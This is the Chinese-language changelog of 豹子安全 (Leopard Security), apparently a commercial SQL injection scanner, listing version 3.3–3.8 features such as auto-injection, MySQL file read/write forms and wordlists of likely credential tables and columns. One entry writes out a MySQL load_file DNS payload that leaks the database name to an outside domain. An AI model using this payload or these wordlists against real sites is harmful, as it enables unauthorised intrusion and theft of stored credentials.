豹子安全

版本历史 - 豹子安全

■ 升级到3.8 版本。

√ 20200530: SQL注入扫描器 中,需要把按钮【菜单↓】左键菜单里面“将[自动注入]设置为"未注入"”。
√ 20200529: SQL注入扫描器 需要增加 [自动注入] 按钮 和 自动注入进度条。 在 SQL注入扫描器 lvSQLInject 列表视图里面,加上四列“自动注入”,以及进度条。



√ 20200508: 在注入器中,给 数据库的用户表和字段 “文本框” 替换的 “下拉组合框”,并在里面添加数据,给用户表添加:
admin,user,customer,member,account,client,secret,password,usr,order,permission,session 等; 给字段添加:
name,password,login,sys,user,account,pwd,passwd,ccv,mail,phone,mobile,fax,address,zip,country,permission,session 等。

√ 其它的小改进。

■ 升级到3.7 版本。

√ 20200502: SQL注入扫描器,数据库管理窗体,在右键菜单中添加一个“删除所有数据库”菜单项。
√ 20200502: SQL注入扫描器,注入“判断方法”为“显错类型(1)”的MySQL数据库。


√ 20200427: MySQL 在 Windows 下 基于DNS 注入有问题 , 应为 select load_file(concat('\\\\dbname.',database(),'.m_-_kalapaikka_-_net.921868.3997bccf4d58c084b256a19.109.ns.0-c.cc\\index.html'));
斜杠搞反了。
√ 20200426: SQL注入扫描器,在网页中浏览的时候,可以单击[后退]和[前进]按钮。
√ 20200426: 在SQL注入中,要在主窗口中加入[复制]和[打开]按钮。
√ 其它的小改进。

■ 升级到3.6 版本。

√ 20200424: SQL注入扫描器,在注入的时候,把搜索出来的链接只要不重复的。
√ 20200423: SQL注入扫描器 注入的之后,要加上响应码的字符描述。HTTPS_ErrorCode_Desc()。
√ 20200422: SQL注入扫描器 注入的时候,就是前面几个是正确的, 后面的不正确。
√ 20200420: SQL注入扫描器 不能注入打不开的网址。
√ 20200418: 给软件授权页面加上[复制]按钮。

■ 升级到3.5 版本。

√ 20200414: 在“关于”和在网站上加上QQ 二维码。

√ 20200413: SQL注入扫描器 需要 [根据 union 查询列数] 或 [根据 order by 查询列数]增加总联合查询(union)参数配置
√ 20200413: 在配置文件中添加单选项:如果有注入点话,仅在SQL注入扫描器中列表视图里面显示一个注入点,然后判断下一个网址。
√ 20200412: SQL注入扫描器中[停止]按钮需要优化。
√ 20200412: 注入列表右键加上菜单“搜索此注入点” 和 “全部显示” 。

√ 20200410: 要根据配置文件选项(config.ini),采用 “cbbScanGET_POST_Cookies=整数型。探测 GET/POST/Cookie 。 1.GET;2.GET 和 POST;3.GET、POST 和 Cookie 。默认为 1 。” 来进行探测。
√ 20200410: 在SQL扫描器中导入网址文件加快,并且使用了线程。

√ 20200409: SQL注入扫描器 需要在"SQL表格日志"面板 中增加 HTTP 响应头的大小 、 HTTP 响应体的大小 和 整个HTTP的整个文本大小。
√ 20200409: 豹子安全(leosec.exe)里面, 应该增加当前文件位置。

√ 20200408: 要在配置工具里面增加 下拉框, 表示 容易、中等、难。如果您为小白,建议使用“容易”;如果为高手,建议使用“难”。这里“注入器难度”有变化的时候,下面几个都有变化。

√ 20200404 在 “SQL表格日志”面板 中的右键菜单 【查看选中的】, 出现调用栈错误,查明原因,是因为要在工程文件中显示出来。原来是没有显示。

■ 升级到 豹子安全 3.4 版本。

√ 2020-03-20 敏感文件扫描器不再“运行时输出”了, 已解决。
√ 2020-03-19 在"请求转发后的URL为:" 后面的网址处, 偶尔会发现__sql__,原因可能是应为 HTTP请求头中没有?符号。已解决。
√ 2020-03-18 在某些情况下,请求转发器CPU占用很高。已解决CPU占用。

■ 升级到 豹子安全 3.3 版本。

√ 2020-03-17 19:29 要处理数据库名、表名、字段名在SQL注入语句中为原样字符。 现在处于大小写混用的状态。主要是 Linux 这样要求的。
√ 2020-03-16 在 “配置工具”中,添加单选项,“□探测'[未知的数据库]'”的,用于加速探测速度。
√ 2020-03-15 将用户界和网站面变成金色和红色。
√ 2020-03-11 20:26 增加 “请求转发器”,一项高级工具,需要懂SQL语句才能很好的运用它。
√ 多处bugs修复。
√ 2019-09-30 DNS MySQL 写文件窗体 和 读文件窗体。
√ 2019-09-25 MySQLWriteFile.aardio MySQL 写文件窗体。ReadFileForm.aardio MySQL 读文件窗体。
√ 2019-09-19 DNS 注入iCount 有问题。
√ 2019-09-19 injections 注入语句部分函数。
√ 2019-09-17 sAllSQLFragment="0x64617461"; //todo: data=>0x64617461
√ 2019-09-16 在 SQLInjectionTest/MySQL/news.php里面,原来的数据库的问题。已搞定。
请见有道云笔记 的《MySQL SQL error #1271 - Illegal mix of collations for operation 'UNION'》

豹子安全 © 2020
www.leosec.net
www.leosec.org
www.leopardsec.com
QQ: 1497683687
微信:leosec_net
Tox ID: leosec.net@hotmail.com
QQ: 1497683687
微信:leosec_net
Tox ID